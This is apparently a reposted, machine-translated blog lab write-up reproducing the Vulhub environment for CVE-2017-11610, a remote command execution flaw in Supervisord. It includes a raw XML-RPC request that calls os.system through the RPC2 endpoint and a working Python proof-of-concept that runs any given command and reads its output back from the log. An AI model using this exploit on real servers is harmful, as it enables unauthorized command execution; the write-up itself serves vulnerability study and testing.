当前位置:网站首页>Vulhub vulnerability recurrence 67_ Supervisor
Vulhub vulnerability recurrence 67_ Supervisor
2022-07-06 05:16:00 【Revenge_ scan】
CVE-2017-11610_ Supervisord Remote command execution vulnerability
Preface
Supervisor(http://supervisord.org/) Yes, it is Python One developed client/server service , yes Linux/Unix A process management tool under the system , I won't support it Windows System . It's easy to monitor 、 start-up 、 stop it 、 Restart one or more processes .
Reference link :
- https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html
- https://blogs.securiteam.com/index.php/archives/3348
-https://github.com/Supervisor/supervisor/commit/90c5df80777bfec03d041740465027f83d22e27b
Vulnerability environment
shooting range :192.168.4.10_ubuntu
#docker-compose build
docker-compose up -d
After the environment starts , visit `http://your-ip:9001` You can view it Supervisord The page of .
Vulnerability testing
Execute arbitrary commands directly :
```
POST /RPC2 HTTP/1.1
Host: localhost
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
<?xml version="1.0"?>
<methodCall>
<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>
<params>
<param>
<string>touch /tmp/success</string>
</param>
</params>
</methodCall>
```
Container view success Create success
## About direct echo POC
@Ricter An idea put forward on Weibo , Very effective , Is to write the result of the command execution to log In file , Call again Supervisord Self contained readLog Method reading log file , Read the results .
Write a simple POC: [poc.py](poc.py), Post it directly :
```python
#!/usr/bin/env python3
import xmlrpc.client
import sys
target = sys.argv[1]
command = sys.argv[2]
with xmlrpc.client.ServerProxy(target) as proxy:
old = getattr(proxy, 'supervisor.readLog')(0,0)
logfile = getattr(proxy, 'supervisor.supervisord.options.logfile.strip')()
getattr(proxy, 'supervisor.supervisord.options.warnings.linecache.os.system')('{} | tee -a {}'.format(command, logfile))
result = getattr(proxy, 'supervisor.readLog')(0,0)
print(result[len(old):])
```
Use Python3 Execute and get the results :`./poc.py "http://your-ip:9001/RPC2" "command"`:
边栏推荐
- The video in win10 computer system does not display thumbnails
- Knowledge points of circular structure
- Force buckle 1189 Maximum number of "balloons"
- 2022 half year summary
- 剑指 Offer II 039. 直方图最大矩形面积
- Pagoda configuration mongodb
- 2022半年总结
- Vite configures the development environment and production environment
- [noip2009 popularization group] score line delimitation
- JS quick start (II)
猜你喜欢
Notes, continuation, escape and other symbols
从0到1建设智能灰度数据体系:以vivo游戏中心为例
Review of double pointer problems
Yolov5 tensorrt acceleration
Can the feelings of Xi'an version of "Coca Cola" and Bingfeng beverage rush for IPO continue?
Excel转换为Lua的配置文件
Codeforces Round #804 (Div. 2) Editorial(A-B)
Huawei equipment is configured with OSPF and BFD linkage
Idea one key guide package
Compilation et connexion de shader dans games202 - webgl (comprendre la direction)
随机推荐
组播和广播的知识点梳理
指针经典笔试题
[noip2008 improvement group] stupid monkey
The ECU of 21 Audi q5l 45tfsi brushes is upgraded to master special adjustment, and the horsepower is safely and stably increased to 305 horsepower
Basic knowledge and examples of binary tree
Excel转换为Lua的配置文件
Rce code and Command Execution Vulnerability
Knowledge points of circular structure
Collection + interview questions
Summary of three log knowledge points of MySQL
Request (request object) and response (response object)
JS quick start (II)
flutter 实现一个有加载动画的按钮(loadingButton)
从0到1建设智能灰度数据体系:以vivo游戏中心为例
nacos-高可用seata之TC搭建(02)
Zynq learning notes (3) - partial reconfiguration
idea一键导包
[buuctf.reverse] 159_[watevrCTF 2019]Watshell
Codeforces Round #804 (Div. 2)
Modbus protocol communication exception